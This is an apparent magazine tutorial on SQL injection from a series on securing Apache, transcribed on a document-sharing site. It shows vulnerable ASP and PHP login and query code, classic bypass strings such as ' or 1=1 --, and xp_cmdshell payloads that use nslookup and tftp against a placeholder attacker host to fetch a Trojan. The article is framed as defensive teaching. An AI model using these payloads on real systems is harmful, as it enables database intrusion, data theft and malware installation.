SECURING APACHE : THE BASICS - III



Similar documents
SQL Injection January 23, 2013

Guarding Against SQL Server Attacks: Hacking, cracking, and protection techniques.

Webapps Vulnerability Report

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva

VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso

Web Application Security

Implementation of Web Application Firewall

A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks

STABLE & SECURE BANK lab writeup. Page 1 of 21

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

CS 558 Internet Systems and Technologies

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

White Paper. Blindfolded SQL Injection

The Top Web Application Attacks: Are you vulnerable?

SQL Injection Attack Lab

Advanced Web Security, Lab

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

SQL Injection Attack Lab Using Collabtive

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Analysis of SQL injection prevention using a proxy server

Manipulating Microsoft SQL Server Using SQL Injection

UQC103S1 UFCE Systems Development. uqc103s/ufce PHP-mySQL 1

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

What? Me, Worry? I've Already Been Hacked. Haven't You?

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Thick Client Application Security

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Web Application Vulnerabilities and Avoiding Application Exposure

Check list for web developers

Cyber Security Workshop Ethical Web Hacking

JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

Penetration Testing for Web Applications (Part Two) by Jody Melbourne and David Jorm last updated July 3, 2003

Guidelines for Web applications protection with dedicated Web Application Firewall

SQL Injection for newbie

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Virtually Secure. a journey from analysis to remote root 0day on an industry leading SSL-VPN appliance

Understanding Web Application Security Issues

Offensive Security. Advanced Web Attacks and Exploitation. Mati Aharoni Devon Kearns. v. 1.0

Project 2: Web Security Pitfalls

ICTN Enterprise Database Security Issues and Solutions

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Common Security Vulnerabilities in Online Payment Systems

What is Web Security? Motivation

1. LAB SNIFFING LAB ID: 10

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Application note: Connecting the to a Database

Project 2: Penetration Testing (Phase II)

WebCruiser Web Vulnerability Scanner User Guide

SQL Injection. By Artem Kazanstev, ITSO and Alex Beutel, Student

OCR LEVEL 3 CAMBRIDGE TECHNICAL

An Anatomy of a web hack: SQL injection explained

Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security

Testing Web Applications for SQL Injection Sam Shober

Web Application Security

Sample Report. Security Test Plan. Prepared by Security Innovation

Client logo placeholder XXX REPORT. Page 1 of 37

Web application security

Blindfolded SQL Injection. Written By: Ofer Maor Amichai Shulman

1. Building Testing Environment

Using Nessus In Web Application Vulnerability Assessments

Application Security Testing. Generic Test Strategy

Web Vulnerability Scanner by Using HTTP Method

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

CSCI110 Exercise 4: Database - MySQL

Why Web Applications are making a hackers life easy. Presented by Jon Grew BT SBS

Serious Threat. Targets for Attack. Characterization of Attack. SQL Injection 4/9/2010 COMP On August 17, 2009, the United States Justice

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

Exploiting Fundamental Weaknesses in Command and Control (C&C) Panels

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

CTF Web Security Training. Engin Kirda

CYBERTRON NETWORK SOLUTIONS

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

WEB ATTACKS AND COUNTERMEASURES

Exposed Database( SQL Server) Error messages Delicious food for Hackers

The SkySQL Administration Console

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

Web application security: Testing for vulnerabilities

Lecture 2. Internet: who talks with whom?

How I hacked PacketStorm ( )

How to hack a website with Metasploit

Railo Installation on CentOS Linux 6 Best Practices

Recommended Practice Case Study: Cross-Site Scripting. February 2007

Web Application Vulnerability Testing with Nessus

INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Internet Technologies. World Wide Web (WWW) Proxy Server Network Address Translator (NAT)

Security Awareness For Server Administrators. State of Illinois Central Management Services Security and Compliance Solutions

WEB SECURITY. Oriana Kondakciu Software Engineering 4C03 Project

Cyber Security Challenge Australia 2014

Getting Started with Dynamic Web Sites

Lesson 7 - Website Administration

Penetration Testing Report Client: Business Solutions June 15 th 2015

Transcription:

SECURING APACHE : THE BASICS - III Securing your applications learn how break-ins occur Shown in Figure 2 is a typical client-server Web architecture, which also indicates various attack vectors, or ways in which Web application attacks affect the regular data flow. Figure 2: Typical client-server Web architecture, with attack vectors We will cover each of these in this series of articles, beginning with injection flaws. Injection flaws are so named because when they are used, malicious attacker-supplied data flows through the application, crosses system boundaries, and gets injected into other system components. These are fairly dangerous attacks, and mostly work because a string that is harmless for PHP (or another website scripting language) can turn into a dangerous weapon when it reaches the database. Such flaws and attacks are particularly important, since they can

affect any dynamic Web application that has not been tested and carefully secured against such holes. We will now take a closer look at the most often encountered injection flaw, SQL injection. Warning:The attack techniques discussed below are intended only as information to help you secure your Web application. Do NOT attempt to use any of these techniques on any server on the Internet, at your workplace, on any network or server that you do not own yourself unless you have written permission from the owner of the server and network to conduct such testing! Indian law provides for prosecution, fines, and even jail terms for breaking into computers that you do not own. Also note that if you have a website of your own, hosted by a hosting provider, or on a rented physical server, the server and network do NOT belong to you even though you own the website content. You should ideally obtain permission from such hosting providers/server owners to carry out even testing probes on your own website/web application. The ideal way to test your Web application would be on your own private LAN or even better, to create a virtual machine on your personal computer, in which you run Apache and a database server, and host a copy of your Web application. You can then do your testing against the virtual machine, without running afoul of cyber laws. SQL injection SQL injection is an exploit in which the attacker injects SQL code into a request to the server (generally through an HTML form input box), to gain access to the backend database, or to make changes in it. If not sanitised properly, SQL injection attacks on your Web application could allow attackers to even ruin your website, besides extracting confidential data. Website features such as login pages, feedback forms, search pages, shopping carts, etc., that use databases, are more prone to SQL injection attacks. The attacker injects specially crafted SQL commands or statements into the form, trying to achieve various results. Almost all scripting technologies ASP, ASP.NET, PHP, JSP and CGI are vulnerable to this attack if they use MS SQL Server, Oracle, MySQL, Postgres or DB2 as their database. Basic knowledge of SQL commands, and some creative guess work, is all it takes to penetrate an unsecured application. Network firewalls and IDSs (Intrusion Detection Systems) might not help,

since they provide filters on HTTP, SSL and other Web traffic ports but the communication with the database is still unsecured. Most programmers are still not aware of the problem, and the scenario seems to be getting worse: the Web security consortium informs us that SQL injection comprised over 7 per cent of all Web vulnerabilities present in every 15,000 applications that it scanned! Note: SQL injection is a global type of attack; it is not restricted to open source platforms, databases or applications, as you can see from the inclusion of proprietary software products in the list above. SQL injection via a login form Let s take a common vulnerable code snippet in an ASP page, which generates a login validation query that is meant to be run on an MS SQL server database: var sql = "SELECT * FROM Users WHERE usr= ' " + user + " ' AND password=' " + paswd + " ' "; In case a valid user enters (into the ASP login page) his username as arpit, and his password as bajpai, then the generated query becomes: SELECT * FROM Users WHERE usr='arpit' AND password='bajpai' That s pretty innocuous, and exactly what the person who wrote the ASP code intended. However, note what happens if an attacker submits malicious text in the username field something like ' or 1=1 --, then the query becomes SELECT * FROM Users WHERE usr=' ' or 1=1 -- AND password=' ' Because a pair of hyphens designates the beginning of the comment in SQL Server s T-SQL, the effective query is now: SELECT * FROM Users WHERE usr=' ' or 1=1 For readers who don t know SQL, this translates to, where the user field is blank, OR 1=1. The trick is that for the logical OR condition, this will always evaluate to True, since one of the operands to the OR statement is True. Thus, this query returns multiple user records, which validates the malicious login!

It doesn t stop there, however: since most Web applications have their administrator user account added to the Users table as the first thing during development, the ASP code in the login page sees that record as the first returned record, and assumes it is the admin user logging in! A person, who doesn t even know a valid username and password, is given administrative permissions in your Web application SQL injection via query string (URL) An attacker might also attempt an SQL injection attack by adding SQL to the URL. How does that work? Let s look closely at an example. Assume a database with table and rows as created and populated by this SQL: CREATE TABLE Products ( ID INT identity(1,1) NOT NULL, prodname VARCHAR(50) NOT NULL, ) INSERT INTO PRODUCTS (prodname) VALUES ( Dell laptops') INSERT INTO PRODUCTS (prodname) VALUES ('Nokia express music') INSERT INTO PRODUCTS (prodname) VALUES ( Samsung dual sim range') Let s also assume that we have the following ASP script, called products.asp, on the site; it uses the database with the above table. 1 2 3 4 5 6 7 <% dim prodid prodid = Request.QueryString("productId") set conn = server.createobject("adodb.connection") set rs = server.createobject("adodb.recordset") query = "select prodname from products where id = " & prodid conn.open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password=" rs.activeconnection = conn

8 9 10 11 12 13 14 15 16 rs.open query if not rs.eof then response.write "Got product " & rs.fields("prodname").value else response.write "No product found" end if %> If we visit products.asp in our browser with the (normal) URL:http://www.example.com/products.asp?productId=1 then we will see the result is Got product Dell laptop. The parameter is taken directly from the query string (submitted URL) and concatenated to the WHERE clause of the query, so the query generated by passing productid=1in the URL is: SELECT prodname FROM products WHERE id = 1 Now, if the attacker tampers with the URL and submits something likehttp://www.example.com/products.asp?productid=0 having 1=1 then the constructed query becomes: SELECT prodname FROM products WHERE id = 0 or 1=1 This would produce an error as shown in Figure 3, or something similar. Figure 3: SQL error caused by query string injection You can also see the error exposing the products fields such as products.prodname. The attacker can use this information maliciously, to insert or delete data from the table. For example, here is a

sample malicious query injection: http://localhost/products.asp?productid=0;insert INTO products(prodname) VALUES(left(@@version,50)) Basically, it returns No product found ; however, it may also run an INSERT query, adding the first 50 characters of SQL Server s @@version variable (which contains the details of SQL Server s version, build, etc.,) as a new record in the Products table. The attacker can then use this information to research specific exploits for that version of SQL Server. Many programmers might suggest that they use double quotes instead of single quotes for security, but this is only a halfway measure because there are always numeric fields or dates within forms or parameters, which will still remain vulnerable just like the example shown below, using PHP/MySQL, which takes a query that uses no single quotes as part of the syntax. $a = "SELECT * FROM accountswhere account = $acct AND pin = $pin"; Now, the attacker injects, into the HTML form fields meant to accept numbers, as $acct= a or a=a # $pin = 1234. The resultant query would be like the following: SELECT * FROM accounts WHERE account = a or a=a# AND pin = 1234 (In this case, the comment character is # instead of the double dash because the database is MySQL. Other such strings used by attackers are ' or a=a --, ' or 'x'='x, 1' or '1'='1, 'or 0=0 #, " or "a"="a, ') or ('a'='a), etc. Notice the power of single quotes in such strings. Running system commands on SQL Server By attacking an SQL Server, an attacker can also gather IP address information through reverse lookups, by running system commands. For example (a.b.c.d represents the attacker s IP address): ';EXEC master..xp_cmdshell "nslookup example.com a.b.c.d" When this fragment is injected, the SQL backend will now execute an nslookup using the attacker s system as the name server. Attackers can use multiple methods, including a network sniffer like tcpdump, on their box, to find the IP address that made the DNS query. If it is a public IP address, the attackers have gained crucial information: they can then compile and launch exploits against that IP address, which are tailored to the operating system and database software.

It is sometimes possible, even if the SQL Server machine doesn t have a public IP address, that an attacker can download a Trojan or backdoor program onto the SQL Server (a.b.c.d is the IP address of a server hosting the malware program): ';EXEC master..xp_cmdshell "tftp i a.b.c.d GET Trojan.exe c:trojan.exe" The downloaded program could be launched with another xp_cmdshell invocation. It could do many things at this point, including connecting outward to the attacker s IP address, to provide the attacker with a direct channel to command the server operating system. If the SQL Server software is running as the Windows Administrator user, which is an all too common shortcut that people take when installing then the attackers now effectively own the server. They can then transfer files from the server, using tftp, which could include confidential, financial or even system password files. More than that, the attackers are now inside the private network they can locally access other systems on the LAN, and try to break into them, something that they could not do directly because the LAN was protected by a firewall blocking connections from the Internet, except for proper requests like HTTP/HTTPS to the Web server. If you want more practical examples of this attack vector, there are a whole bunch of videos available on YouTube and Metacafe. I would like to reiterate here that neither I nor LFY aims to teach readers to attack servers; this is meant to give you knowledge that you need in order to protect your own infrastructure.

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information